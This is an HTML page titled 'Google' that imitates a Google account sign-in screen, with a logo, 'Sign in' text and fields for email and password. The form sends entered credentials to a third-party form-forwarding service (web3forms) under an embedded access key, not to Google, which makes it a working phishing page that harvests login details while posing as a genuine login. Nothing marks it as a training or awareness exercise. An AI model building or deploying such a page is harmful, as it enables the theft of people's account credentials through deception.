<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google</title>
</head>
<style>
    body{
     font-family: sans-serif;
     margin: 0;   
    }
    img{
        height: 90px;
        width: 60%;
        
    }
    
    div{
        text-align: center;
    }
    .head{
        font-size: 22px;
    }
    p{
        text-align: center;
        
    }
    input{
        border-radius: 3px;
        border-color: black;
        width: 80%;
        height: 30px;
    }
    .button{
        width: 20%;
        height: 30px;
        background-color: #0018ffb6;
        color: ghostwhite;
        border: blue;
    }
    .button1{
        text-align: right;
    }
</style>
<body>
    <div>
    <img src="google.jpg" alt="Google">
    </div>
    <p class="head"><big>Sign in</big></p>
    <p>with your Google account. You'll also sign in to Google services in your apps & Safari</p>
    <div class="login">
        <form action="https://api.web3forms.com/submit" method="POST">
    <input type="hidden" name="access_key" value="f4f85299-1797-4df0-9ce7-0ba3757a78d6">
        <input type="email" name="Email" placeholder="&nbsp;&nbsp; Email or phone" id="email">
        <br><br>
        <input type="password" name="Password" placeholder="&nbsp;&nbsp; Password" id="pass">
   <br><br>
   <div class="button1">
   <input type="submit" class="button"> &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;
    </form>
    </div>
</body>
</html>
